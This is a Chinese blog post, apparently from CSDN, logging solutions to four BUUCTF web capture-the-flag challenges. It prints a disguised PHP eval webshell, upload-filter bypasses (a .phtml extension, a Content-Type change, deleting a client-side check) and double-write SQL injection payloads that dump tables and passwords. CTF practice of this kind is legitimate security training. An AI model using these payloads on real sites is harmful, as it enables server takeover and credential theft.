BUUCTF(刷题日记3)

最新推荐文章于 2024-09-28 17:54:20 发布
最新推荐文章于 2024-09-28 17:54:20 发布
阅读量175 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74022830/article/details/129937742
版权

BBUUCTF

文章目录

一、[极客大挑战 2019]Knife

在这里插入图片描述看到了一句一句话木马使用蚁剑连接
在这里插入图片描述根目录下找到flag
在这里插入图片描述

二、[极客大挑战 2019]Upload

图片上传题先看一下前端
在这里插入图片描述在这里插入图片描述没啥问题
先传一下一句话木马
在这里插入图片描述抓包改一下Content-Type:试试image/png
在这里插入图片描述不能是php

绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht

经过尝试发现phtml可以
在这里插入图片描述但是不能带有<?换一个一句话木马

GIF89a
<script language="php">eval($_POST['shell']);</script>

改后缀为.phtml
在这里插入图片描述上传成功用蚁剑链接
在这里插入图片描述目录在upload里面
在这里插入图片描述
链接成功找flag
在这里插入图片描述

三、[ACTF2020 新生赛]Upload

在这里插入图片描述查看前端
在这里插入图片描述把内个return checkFile()删了或者改为ture
上传上个题的内个phtml文件直接ok
在这里插入图片描述这个应该是蚁剑链接的时候要加上
在这里插入图片描述链接成功找flag

在这里插入图片描述

四、[极客大挑战 2019]BabySQL

sql注入
在这里插入图片描述试一下万能密码
在这里插入图片描述不行or被过滤了
使用双写绕过

1' oorr 1=1#

在这里插入图片描述给回显了
爆回显位

1' uunionnion ssleectlect 1,2,3#

在这里插入图片描述爆数据库

1' uunionnion ssleectlect 1,database(),3#

在这里插入图片描述爆表

1' uunionnion sselectelect 1,group_concat(table_name),3 ffromrom infoorrmation_schema.tables wwherehere table_schema='geek'#

在这里插入图片描述爆列

1' uunionnion sselectelect 1,group_concat(column_name),3 ffromrom infoorrmation_schema.columns  wwherehere table_schema='geek' aandnd table_name='b4bsql'#

在这里插入图片描述爆字段

1' ununionion seselectlect 1,group_concat(id,username,passwoorrd),3 ffromrom b4bsql#

在这里插入图片描述在这里插入图片描述

总结

1、木马传入时的前端和后端绕过
2、sql注入双写绕过

yzhikk
关注
BUUCTF刷题日记
weixin_74022830的博客
03-23 1064
BUUCTFweb刷题记录
BUUctf 刷题日记
jie_a的博客
06-16 247
[HCTF 2018]WarmUp 打开是个笑脸,源代码给了个地址 进来是个php代码页面 highlight_file(__FILE__); //打印代码 class emmm //定义emmm类 { public static function checkFile(&$page)//将传入的参数赋给$page { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//声明$whiteli
buuctf刷题日记
Ching_jen的博客
10-10 268
babyrop ida打开 main函数 sub_804871F(): sub_80487D0(): 可以看到在sub_80487D0()这个函数中,当a1也就是main函数中的参数v2不等于127的时候read函数就可以无限的读入,栈溢出漏洞,所以要改变v2的值。而v2的值是由函数sub_804871F()来赋值,这个函数中可以利用strlen()的特性,它读到’\x00’时就会认为字符长度已读完,还要利用这点来绕过后面的if中条件。参数s的值为0未赋初值。并且这里可以看到v2的地址和buf的地址差0x
【Web】纯萌新的BUUCTF刷题日记Day1
uuzeray的博客
04-06 1206
刚学会F12看源码,每天做个一页题,吃嘛嘛香。
BUUCTF刷题日记(week1)
CharlieSuee的博客
04-27 132
据说flag在这个文件里面?利用../可以返回上级目录,查看这个文件。看url,在这里我进行了构造payload操作。查看源代码发现有source.php,看看。代码审计,看出来应该传参cat=dog。尝试将源码用base64编译并显示出来。简单的SQL注入,语句是单引号闭合。用cyberchef解base64。再看看这个hint.php。发现flag只是被注释掉。查看源码,很简单很普通。
BUUCTF 刷题日记
m0_74375241的博客
04-15 219
学习之路还很漫长还有好多题要刷,加油加油!!!
BUUctf刷题日记(四道题一个wp)
jie_a的博客
06-17 269
第13题开始了,以前的做过了 [护网杯 2018]easy_tornado 这是一道模板注入题,我看了没思路,看了wp才知道 我还没见过这种模板… 模板注入第一步,让他报错 通过{{handler.settings}},可以获取到cookie 我觉得有点神奇,模板注入这块我不是很懂,可以参考这个 博客 然后根据提示的公式,计算md5 import hashlib hash = hashlib.md5() filename='/fllllllllllllag' cookie_secret="b978746
buuctf刷题日记 [网鼎杯 2020 朱雀组]phpweb 1
weixin_45642610的博客
03-04 296
buuctf刷题日记 [网鼎杯 2020 朱雀组]phpweb 1 看源码,扫后台没有什么信息。抓包后看见 func=date&p=Y-m-d+h%3Ai%3As+a 很像date()函数的运用方法,p的参数类似data()的参数。 返回时间日期等,调用func的函数date(),以p的内容作为函数参数,就是call_user_func()函数的用法。 构造payload获取index.php源码 func=file_get_contents&p=index.php <?php
BUUCTF(刷题日记2)
weixin_74022830的博客
04-02 401
1、空格绕过方法和编码绕过2、mssql中||表示连接操作符,不表示或的逻辑。3、设置 sql_mode=PIPES_AS_CONCAT来转换操作符的作用//就是将||的或转换成连接符。
刷题日记2(buuctf web题)
Aurora_lili的博客
04-25 407
单纯的url/flag.php得不到任何东西,查看wp,解释如下:这里它利用了filter伪协议,该协议刚好就能够查看文件包含的漏洞,所以当我们利用该协议查看flag.php时,会将它的源代码爆出来,但是因为base64的加密原因,所以我们还需要进行一次base64解密。5.0版本以上,varchar(100),指的是100字符,无论存放的是数字、字母还是UTF8汉字(每个汉字3字节),都可以存放100个。接着用改名字的方式获取flag,因为flag在1919的表中,所以我们最后要查询的是1919的表,
buuctf刷题
小飒的博客
07-11 289
重温一下buuctf前面的题目 hint: flag in ffffllllaaaagggg mb_substr() 函数返回字符串的一部分mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置checkFile函数的作用: 判断page是否被设置,是否为字符串 判断page是否在whitelist中 以?为分割符取出之前的字符,保存在page判断_page 判断p​age判断_page是否在whitelist中 url解码后以?为分割符取出之前字符,判断是否在whitelist中?fil
buuctf刷题记录
mackilo的博客
02-16 2969
2022-1-16 reverse2 扔到IDA64里解析, F5生成伪代码 通过分析得出经过一定的变换后与flag进行比较的 查看flag的值,是{hacking_for_fun} 再返回前面看如何对flag进行变换的,将105、114、49转换成值, 箭头所指的函数功能为,把flag中存在的’i’以及’r’转换成’1’,进而得出正确flag。 2022-1-17 内涵的软件 下载好以后发现是乱码的exe文件,拖到ExeinfoPE里查看信息, 没有加壳,用IDA打开,查看main函数 可以看到跳
buuctf刷题记录(3)
weixin_53409153的博客
07-19 677
[ACTF新生赛2020]rome 首先,还是查壳: 无壳,为32位: 跟进,跳转到交叉应用列表: 然后,在F5查看伪代码: int func() { int result; // eax int v1; // [esp+14h] [ebp-44h] int v2; // [esp+18h] [ebp-40h] int v3; // [esp+1Ch] [ebp-3Ch] int v4; // [esp+20h] [ebp-38h] unsigned __int8 v5; /
BUUCTF刷题系列
qq_45655564的博客
07-11 514
[HCTF 2018]WarmUp 查看网页源代码,得到source.php 可以得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
基于php的幸运舞蹈课程工作室管理系统
计算机学姐的博客
09-28 917
【2025最新】基于php+vue+MySQL的幸运舞蹈课程工作室管理系统,前后端分离。
PHP中error_reporting函数作用
sheji888的专栏
09-24 873
除了使用PHP内置的错误处理机制外,你还可以使用函数来定义自己的错误处理函数。这允许你更灵活地控制错误报告的行为,例如,将错误信息发送到外部系统或显示自定义的错误页面。
web平台搭建-LAMP(CentOS-7)
gsdgdg00的博客
09-24 790
一. 准备工作环境要求:操作系统:CentOS 7.X 64位网络配置:nmtui字符终端图形管理工具或者直接编辑配置文件关闭SELinux和firewalld防火墙防火墙:临时关闭:systemctl stop firewalld永久关闭:systemctl disable firewalld。
php中打印函数
09-24 454
PHP中,打印函数主要用于输出或显示数据。常用的打印函数包括:
基于php的医院信息管理系统
最新发布
计算机学姐的博客
09-28 695
【2025最新】基于php+vue+MySQL的医院信息管理系统,前后端分离。
buuctf reverse reverse3
09-27
BUUCTF Reverse Reverse3是一个题目,通过对给定的字符串进行逆运算,解密出一个flag。首先,给出的字符串经过了base64加密和按位加的操作,得到了"e3nifIH9b_C@n@dH"这个结果。要得到flag,我们需要进行逆运算。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值